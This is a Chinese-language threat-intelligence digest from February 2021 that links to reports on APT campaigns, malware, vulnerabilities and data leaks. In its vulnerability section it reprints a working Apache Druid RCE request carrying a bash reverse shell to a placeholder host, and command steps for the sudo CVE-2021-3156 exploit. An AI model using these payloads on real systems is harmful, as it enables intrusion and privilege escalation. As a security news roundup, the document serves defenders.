今日威胁情报2021/2/2-3(第344期)

  • A+
所属分类:安全新闻

今日威胁情报2021/2/2-3(第344期)

TI.360.CN


高级威胁分析
今日威胁情报2021/2/2-3(第344期)


1、Kobalos –对高性能计算基础架构的复杂Linux威胁攻击

ESET研究人员分析了针对高性能计算(HPC)集群的恶意软件,以及其他引人注目的目标。我们对这种小而复杂的恶意软件进行了反向工程,该恶意软件可移植到许多操作系统(包括Linux,BSD,Solaris以及可能的AIX和Windows)中。我们将其命名为Kobalos恶意软件,是因为它的代码量很小且有许多技巧。

今日威胁情报2021/2/2-3(第344期)

https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/


2、CryptoMimic组织攻击,针对包括日本在内的全球金融机构(特别是与加密相关的组织)的有针对性的攻击组,并且指出了它与Lazarus的相关性。

今日威胁情报2021/2/2-3(第344期)

https://insight-jp.nttsecurity.com/post/102gpur/cryptomimic


3、隶属朝鲜的APT组织分发的Amadey Troja

https://blog.bushidotoken.net/2021/02/amadey-trojan-distributed-by-dprk.html


4、Konni APT 组织以朝鲜疫情物资话题为诱饵的攻击活动分析

Konni APT 组织是朝鲜半岛地区最具代表性的 APT 组织之一,自 2014 年以来一直持续活动,据悉其背后由朝鲜政府提供支持,该组织经常使用鱼叉式网络钓鱼的攻击手法,经常使用与朝鲜相关的内容或当前社会热点事件来进行攻击活动,该组织的主要目标为韩国政治组织,以及日本、越南、俄罗斯、中国等地区。

    微步情报局近期通过威胁狩猎系统监测到 Konni APT 组织最新攻击活动,经过分析有如下发现:

  1. 攻击者以“朝鲜疫情物资”话题相关文章作为诱饵文档进行攻击活动,诱饵文档延续了该组织以往的攻击手法,将正文颜色设置为难以阅读的颜色以诱导用户启用宏。

  2. 在文档携带的恶意宏中,从失陷的服务器中下载后门模块并执行。

  3. 后门模块为 Amadey 家族木马,攻击者可利用该后门模块进行下一步恶意模块的分发,该组织经常使用此家族木马进行攻击活动。

  4. 根据样本关联信息显示,本次攻击活动手法与以往安全机构披露的“隐士”、“BlueSky” 等攻击活动手法类似,另外还与具有相同背景的半岛地区 APT 组织 Kimsuky 有诸多关联之处。

  5. 微步在线通过对相关样本、IP 和域名的溯源分析,共提取 31 条相关 IOC,可用于威胁情报检测。微步在线威胁感知平台 TDP、威胁情报管理平台 TIP、威胁情报云 API、互联网安全接入 OneDNS 等均已支持对此次攻击事件和团伙的检测。

https://www.anquanke.com/post/id/230116


5、微软跟踪僵尸网络利用SPAM邮件海量攻击目标,每月百万邮件发送,主要针对金融行业、健康理疗保健、商业金融分销等行业。

https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/


技术分享
今日威胁情报2021/2/2-3(第344期)


1、SystemBC和Cobalt Strike配合起来的样本分析

今日威胁情报2021/2/2-3(第344期)

https://isc.sans.edu/diary/27060


2、勒索软件运营商正在利用两个VMWare ESXi漏洞CVE-2019-5544和CVE-2020-3992来加密虚拟硬盘。CVE-2019-5544 and CVE-2020-3992,
https://www.zdnet.com/article/ransomware-gangs-are-abusing-vmware-esxi-exploits-to-encrypt-virtual-hard-disks/


3、Trickbot masrv模块分析。

https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/


4、Agent Tesla amps up information stealing attacks,好木马、特斯拉!

今日威胁情报2021/2/2-3(第344期)

https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/


漏洞相关
今日威胁情报2021/2/2-3(第344期)


1、CVE-2021-25646 Apache Druid RCE POC

POST /druid/indexer/v1/sampler HTTP/1.1Host: x.x.x.x:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/jsonContent-Length: 1045Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c [email protected]|bash 0 echo bash -i >&/dev/tcp/x.x.x.x/4444 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

https://gist.github.com/FanqXu/36c5e0070fd8e0b6646993b4e386a6b1


2、SolarWinds软件中发现了3个新的严重安全漏洞,(CVE-2021-25274和CVE-2021-25275),而在公司的Windows Serv-U FTP服务器中发现了第三个单独的漏洞(CVE-2021-25276)

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/full-system-control-with-new-solarwinds-orion-based-and-serv-u-ftp-vulnerabilities/


3、补上那个供应链的漏洞,SolarWinds Orion API身份验证旁路允许远程执行命令,CVE-2020-10148

https://kb.cert.org/vuls/id/843464


4、CVE-2021-3156  POC

#Credit to @hackerfantastic. I'm just posting this here for those who need to test systems without breaking them.
mkdir POC-CVE-2021-3156cd ./POC-CVE-2021-3156ln -s /usr/bin/sudo ./sudoeditchmod 555 ../POC-CVE-2021-3156/env -i 'AA=a' 'B=b' 'C=c' 'D=d' 'E=e' 'F=f' ./sudoedit -s '1234567890123456789012' ls -al `which sudo`uname -a


数据泄露
今日威胁情报2021/2/2-3(第344期)


1、警察考试数据库暴露了50万印度公民的身份信息

今日威胁情报2021/2/2-3(第344期)

https://cloudsek.com/threatintelligence/police-exam-database-exposes-500k-indian-citizens-pii/


2、drivesure数据泄露,320W用户数据

今日威胁情报2021/2/2-3(第344期)

https://raidforums.com/Thread-SQL-drivesure-com-3-229-101-Customers-Car-Dealership-services-website


网络战与网络情报
今日威胁情报2021/2/2-3(第344期)


1、2020年有组织的社交媒体操纵的全球清单

今日威胁情报2021/2/2-3(第344期)

https://comprop.oii.ox.ac.uk/research/posts/industrialized-disinformation/#Continue


2、看故事:太空网络安全

https://securityintelligence.com/articles/space-cybersecurity-how-lessons-learned-on-earth-apply-in-orbit/


3、X

https://thehill.com/policy/cybersecurity/536838-intel-agency-warns-of-threats-from-china-collecting-sensitive-us-health



今日威胁情报2021/2/2-3(第344期)

今日威胁情报2021/2/2-3(第344期)

本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/2/2-3(第344期)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: